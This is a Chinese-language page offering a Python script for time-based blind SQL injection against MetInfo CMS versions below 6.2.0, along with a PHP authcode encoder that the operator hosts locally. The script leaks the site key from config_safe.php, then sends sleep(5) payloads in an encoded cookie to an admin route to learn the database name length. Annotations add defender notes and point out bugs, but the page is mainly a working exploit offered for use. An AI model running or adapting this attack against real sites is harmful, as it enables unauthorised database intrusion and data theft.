metinfo通杀SQL盲注利用脚本


小于v6.2.0版本。脚本由Spec编写,仅供学习交流使用,请勿恶意攻击他人网站,如非法利用……

#coding=utf-8
import requests
import re
import sys
import time
 
 
# Read the site key out of config/config_safe.php and kick off the probe.
def getKey(url,headers,local_url):
    """Fetch ``<url>/config/config_safe.php`` and hand its embedded key to ``databaseLen``.

    The key is taken from whatever sits between ``<?php/*`` and ``*/?>`` in
    the response body. Every failure (network error, no regex match, empty
    match list) is collapsed into one ``sys.exit`` message.

    Defender's note: this step only works when the config file's source is
    returned verbatim to an unauthenticated GET; serving ``.php`` only
    through the interpreter, never as static text, removes the key leak.
    """
    try:
        url_key = url + "/config/config_safe.php"
        rsp = requests.get(url_key,headers)
        # Greedy capture of the comment body; the key is expected to be the
        # whole comment.
        p = re.compile(r'<\?php\/\*(.*)\*\/\?>')
        p1 = p.findall(rsp.text)
        key = p1[0]  # IndexError when nothing matched -> handled below
        databaseLen(key,headers,local_url,url)
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit and hides
        # the real cause (DNS failure, timeout, regex miss) behind one message.
        sys.exit("The website is secure!!")
# Probe the length of the current database name (1..20) with a timing oracle.
def databaseLen(key,headers,local_url,url):
    """Send one ``sleep(5)``-conditioned payload per candidate length 1..20.

    Each candidate is spliced into the ``str`` query fragment and forwarded
    through ``queryKey``; the slow response identifies the true length. The
    function returns nothing and does not stop early after a hit.

    Defender's note: the traffic signature is a burst of near-identical
    requests where exactly one takes ~5 s server time; the server-side fix is
    parameterised queries, and a WAF rule on ``sleep(``/``if((select`` in
    this parameter catches the probe itself.
    """
    for str in range(1,21):
        # ``str`` shadows the builtin; kept as-is to preserve behaviour.
        str = '%d'%str
        payload = "1%27%20or%20if((select%20length(database())="+ str +"),sleep(5),1)%23"
        queryKey(key,headers,payload,local_url,url)
# Run the payload through the operator's locally hosted encoder.
def queryKey(key,headers,str,local_url,url):
    """POST ``key`` and ``str`` to ``local_url`` and pass the encoded reply on.

    ``local_url`` is the PHP ``authcode`` endpoint shown later on this page;
    its response text is the encoded value that ``getTestUrl`` places in a
    cookie. ``str`` shadows the builtin and holds the raw payload string.
    The body is concatenated by hand, not form-encoded.
    """
    payload = "key="+key+"&str="+str
    rsp = requests.post(local_url,headers = headers,data = payload)
#   str = rsp.url
#   data = str.replace('+','%20').replace('%28','(').replace('%29',')').replace('%3D','=').replace('%2C',',')
#   print(data)
    getTestUrl(url,rsp.text,headers)
# Build the request that carries the encoded payload and time it.
def getTestUrl(url,payload,headers):
    """Request ``/admin/index.php`` with the encoded payload in cookie ``p``.

    The query string selects the ``user/web/register/doemailvild`` route; the
    final response URL (``rsp.url`` follows redirects) is handed to
    ``getData`` for the latency check.

    Defender's note: a cookie named ``p`` whose decoded value contains SQL
    fragments on this route is a high-signal detection; server-side, decoded
    cookie data must never be concatenated into a query.
    """
    params = {'n':'user','m':'web','c':'register','a':'doemailvild'}
    # The two fixed cookies are copied from the author's own session.
    cookies = {'Phpstorm-cd979afe':'49f537dc-5078-4407-a224-9fbd39b31aa6','PHPSESSID':'bba89344cb69a733ca0e20c46d7338b4','p':payload}
    test_url = url + "/admin/index.php"
    rsp = requests.get(test_url,params = params,cookie = cookies)
    str = rsp.url  # shadows the builtin; kept as-is
    getData(str,headers)
# The timing oracle: print "ok" when the round trip exceeds 4 seconds.
def getData(url,headers):
    """GET ``url`` and print ``ok`` if the response takes longer than 4 s.

    Only ``ok`` is printed; the candidate length that triggered it is not
    reported, and a slow network alone also trips the 4 s threshold.
    """
    startTime = time.time();
    rsp = requests.get(url,headers)
    if time.time() - startTime > 4:
        print("ok")
    else:
        pass
if __name__ == '__main__':
    # Browser-like headers; the Content-Type matches the form body that the
    # PHP encoder reads from $_POST.
    headers = {
        "Content-Type":"application/x-www-form-urlencoded",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"en-US,en;q=0.5"
    }
    url = input("please input URL:")
    # NOTE: ``"http://" or ("https://" in url)`` is always truthy, so this
    # branch runs for any input and the else-branch is unreachable; no URL
    # validation actually happens here.
    if "http://" or "https://" in url:
        local_url = input("请输入本地搭建的encode函数地址:")
        getKey(url,headers,local_url)
    else:
        print("please input the correct url!!")
本地搭建的encode函数源码

<?php
/**
 * UCenter/Discuz-style authcode: an RC4 keystream keyed from md5 digests.
 *
 * Key schedule: $key (or the UC_KEY constant when empty; UC_KEY is not
 * defined anywhere on this page) -> md5 -> $keya (stream key) and $keyb
 * (integrity key). $keyc is a 4-char salt: read from the front of the token
 * on DECODE, drawn from md5(microtime()) otherwise. Plaintext layout before
 * the XOR: 10-digit expiry, 16 hex chars of md5(data.$keyb), then the data.
 * Encoded output is $keyc . base64(result) with '=' padding stripped.
 *
 * Crypto review notes, for anyone tempted to reuse this as a general
 * primitive: RC4 with an md5-derived key, a salt sourced from microtime(),
 * a truncated-md5 check that does not cover $keyc or the expiry field and is
 * compared with '==' (PHP loose comparison, not constant time). Treat it as
 * obfuscation, not authenticated encryption.
 *
 * @param string $string    data to encode, or $keyc.base64 token to decode
 * @param string $operation 'DECODE' decodes; any other value encodes
 * @param string $key       shared secret; falls back to UC_KEY when empty
 * @param int    $expiry    validity in seconds on encode, 0 = never expires
 * @return string decoded data ('' when the check fails) or the encoded token
 */
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){
        $ckey_length = 4; 
        $key = md5($key ? $key : UC_KEY);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        // Salt: first 4 chars of the token on DECODE, fresh on ENCODE.
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
        // 64-char stream key; only here does the salt influence the keystream.
        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);
        // DECODE: strip salt, base64-decode. ENCODE: prepend expiry + check.
        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);
        $result = '';
        $box = range(0, 255);
        $rndkey = array();
        // Repeat the key bytes to 256 entries.
        for($i = 0; $i <= 255; $i++) {
            $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }
        // RC4 key-scheduling algorithm (KSA).
        for($j = $i = 0; $i < 256; $i++) {
            $j = ($j + $box[$i] + $rndkey[$i]) % 256;
            $tmp = $box[$i];
            $box[$i] = $box[$j];
            $box[$j] = $tmp;
        }
 
        // RC4 pseudo-random generation (PRGA) XORed over the input.
        for($a = $j = $i = 0; $i < $string_length; $i++) {
            $a = ($a + 1) % 256;
            $j = ($j + $box[$a]) % 256;
            $tmp = $box[$a];
            $box[$a] = $box[$j];
            $box[$j] = $tmp;
            $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
 
        if($operation == 'DECODE') {
            // Accept when expiry is 0 or still in the future and the 16-char
            // md5 check matches; both comparisons are loose '=='.
            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
               return substr($result, 26);
            } else {
               return '';
            }
        }else{
            return $keyc.str_replace('=', '', base64_encode($result));
        }
    }
// Endpoint called by queryKey(): encodes $_POST['str'] under $_POST['key']
// and echoes it URL-encoded. 'ENCOUDE' is a typo for 'ENCODE', but any value
// other than 'DECODE' takes the encode branch, so behaviour is unaffected.
// It is unauthenticated and acts as an encoding oracle for whatever key is
// posted; it belongs on a local interface only, as the page's heading says.
print_r(urlencode(authcode($_POST['str'],'ENCOUDE',$_POST['key'],0)));
